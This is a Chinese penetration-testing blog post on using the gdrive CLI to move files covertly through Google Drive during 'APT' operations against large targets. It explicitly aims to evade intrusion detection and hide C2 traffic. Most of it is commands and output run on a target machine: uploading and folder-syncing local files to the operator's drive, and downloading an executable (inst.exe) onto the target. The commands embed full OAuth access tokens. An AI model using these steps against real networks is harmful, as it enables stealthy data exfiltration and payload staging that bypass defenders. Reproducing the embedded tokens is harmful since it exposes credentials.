渗透测试-内网大规模文件传输

admin

140350
文章

117
评论

2023年10月23日22:12:57评论22 views字数 5310阅读17分42秒阅读模式

0x01

介绍

✦

在定向apt大型目标的时候，目标内网系统会有各种流量入侵检测设备，为了动静小一点，也为了不在传输过大流量数据时暴露自己的c2，我们有必要用到第三方app/网址进行上传/下载，本次主要就 google drive 上传下载为例，进行实操详解。gdirve本身是一个跨平台语言go开发而成的命令行工具，能够兼容linux和win，并且流量域名全部走的是google.com的高可信域名。

0x02

实战和传输

✦

0x02.1 测试储备

1. 测试环境：

Windows10
杀软：360，360杀毒

2. 依赖条件：

能够上外网
一个google账号以及api (access token....)

先下载gdrive到本地的机器上。

所有参数如下：

C:UsersadminDesktop>gdrive.exe help uploadUpload file or directorygdrive [global] upload [options] <path>
global:  -c, --config <configDir>             Application path, default: C:UsersadminAppDataRoaming.gdrive  --refresh-token <refreshToken>       Oauth refresh token used to get access token (for advanced users)  --access-token <accessToken>         Oauth access token, only recommended for short-lived requests because of short lifetime (for advanced users)  --service-account <serviceAccount>   Oauth service account filename, used for server to server communication without user interaction (filename path is relative to config dir)
options:  -r, --recursive               Upload directory recursively  -p, --parent <parent>         Parent id, used to upload file to a specific directory, can be specified multiple times to give many parents  --name <name>                 Filename  --description <description>   File description  --no-progress                 Hide progress  --mime <mime>                 Force mime type  --share                       Share file  --delete                      Delete local file when upload is successful  --timeout <timeout>           Set timeout in seconds, use 0 for no timeout. Timeout is reached when no data is transferred in set amount of seconds, default: 300  --chunksize <chunksize>       Set chunk size in bytes, default: 8388608

0x02.2 实战教程

我们先上wiki看下如何使用 gmail 申请access-token

It seems that this app has been blocked so you can't get an authorization key by going to the URL that is presented when you run it. The following workaround seems to work:

Go to https://developers.google.com/oauthplayground · Under the Drive API v3, select one of the following APIs:  · https://www.googleapis.com/auth/drive.readonly  · https://www.googleapis.com/auth/driveClick Authorize APIsClick Exchange Authorization Codes for TokenCopy the resulting Access token will allow you to run gdrive with --access-token. For some reason the Refresh token does not seem to work with --refresh-token.

1.进入https://developers.google.com/oauthplayground。

2.选择Drive API, 点击Authorize APIs。

3.点击 Exchange Authorization Codes for Token。

这样就拿到了Access Token：ya29.A0ARrdaM-vPnyNYOdORKc-j2WgGjgO7OVxXGhW3b80dxa-ukuqsn8lnSssJUWIT7Qu0au-UXrotTNTi4a_kw-O6mItkAplPbwDGxRloVrJA9KM9kx7tPhzTbMpyEryiOk7W4E1HsH7d6GnTCs4AetnHTND5QF1

注意，这里显示了，Access Token只有3597秒的有效期。

有了Access token以后，就可以开始在目标机器上传输文件了。

gdrive.exe upload 2.tmp --access-token ya29.A0ARrdaM-vPnyNYOdORKc-j2WgGjgO7OVxXGhW3b80dxa-ukuqsn8lnSssJUWIT7Qu0au-UXrotTNTi4a_kw-O6mItkAplPbwDGxRloVrJA9KM9kx7tPhzTbMpyEryiOk7W4E1HsH7d6GnTCs4AetnHTND5QF1

#使用access-token作为认证，传输同级目录的2.tmp文件到自己的google drive网盘上。

我们抓包查看，走的是googleapis.com的域名，流量也是googleapis.com的流量。

回到我们的google drive上查看，可以看到2.temp已经上传了。

其他常见参数解释。

在目标机器上列出自己google drive上的所有云盘文件。

C:UsersAdministratorDownloadsresults>gdrive.exe list --access-token ya29.A0ARrdaM-vPnyNYOdORKc-j2WgGjgO7OVxXGhW3b80dxa-ukuqsn8lnSssJUWIT7Qu0au-UXrotTNTi4a_kw-O6mItkAplPbwDGxRloVrJA9KM9kx7tPhzTbMpyEryiOk7W4E1HsH7d6GnTCs4AetnHTND5QF1Id                                  Name           Type   Size      Created1lHwTeV779Yc6sqdmB2N4CXFhlI9w1jyM   2.tmp          bin    10.1 KB   2022-04-14 15:21:581X21v-LjM8RY9v_6lLMq16PL8uptqdADj   inst.exe       bin    3.4 MB    2022-04-14 11:04:26165BZ_XO386NdDngXmB6yoJYZhiNoiKOb   2.txt          bin    39.7 KB   2022-04-14 10:57:241kJNLrQwSZhDS7hYn1zStMolNLdeFezvr   Telegram.exe   bin    1.3 MB    2022-04-14 10:56:291xd31Xvo4J6Sl4sFS4ny6ntDn1d0c2szH   1.txt          bin    6.0 KB    2022-04-14 10:55:051oX4rCA-X4DWmVLUnxMUfpsPcxFfmqark   1.txt          bin    6.0 KB    2022-04-14 10:53:40

使用access-token作为认证，下载我们google-drive网盘上id为1X21v-LjM8RY9v_6lLMq16PL8uptqdADj的文件(也就是inst.exe)。

C:UsersAdministratorDownloadsresults>gdrive.exe download 1X21v-LjM8RY9v_6lLMq16PL8uptqdADj  --access-token ya29.A0ARrdaM-vPnyNYOdORKc-j2WgGjgO7OVxXGhW3b80dxa-ukuqsn8lnSssJUWIT7Qu0au-UXrotTNTi4a_kw-O6mItkAplPbwDGxRloVrJA9KM9kx7tPhzTbMpyEryiOk7W4E1HsH7d6GnTCs4AetnHTND5QF1Downloading inst.exe -> inst.exeDownloaded 1X21v-LjM8RY9v_6lLMq16PL8uptqdADj at 3.4 MB/s, total 3.4 MB

同步目录下所有的文件。

创建test目录。

C:UserspppDocumentsDesktop>gdrive.exe  mkdir test  --access-token ya29.a0AfB_byAbOgB8ChlwIx4wp_EWpW_BnH_1dnELePWU-O0tS3G0HjIf6sgAK518Ivj1vjhfm-kgIfI3HYl3Z7WyrBXU9zSU9AlOZi-l7TP-lxK1T_kBmivfo72H1swLp2UvKmSIzXDa_Wyi0RU71iFGp4OFAznosq0aCgYKAaASARMSFQHsvYlsObn6MwWbZM66ONFE0x-X8Q0166Directory 1MFeJKZocF1djZxO5V-b1sr_wHjbren12 created

把本地的1/文件夹里的所有东西，全部同步到云盘上的test目录。

C:UserspppDocumentsDesktop>gdrive.exe  sync upload 1/ 1MFeJKZocF1djZxO5V-b1sr_wHjbren12  --access-token ya29.a0AfB_byAbOgB8ChlwIx4wp_EWpW_BnH_1dnELePWU-O0tS3G0HjIf6sgAK518Ivj1vjhfm-kgIfI3HYl3Z7WyrBXU9zSU9AlOZi-l7TP-lxK1T_kBmivfo72H1swLp2UvKmSIzXDa_Wyi0RU71iFGp4OFAznosq0aCgYKAaASARMSFQHsvYlsObn6MwWbZM66ONFE0x-X8Q0166Starting sync...Collecting local and remote file information...Found 2 local files and 0 remote files

2 remote files are missing[0001/0002] Uploading test123.txt -> testtest123.txt[0002/0002] Uploading gdrive.exe -> testgdrive.exeSync finished in 20.5673107s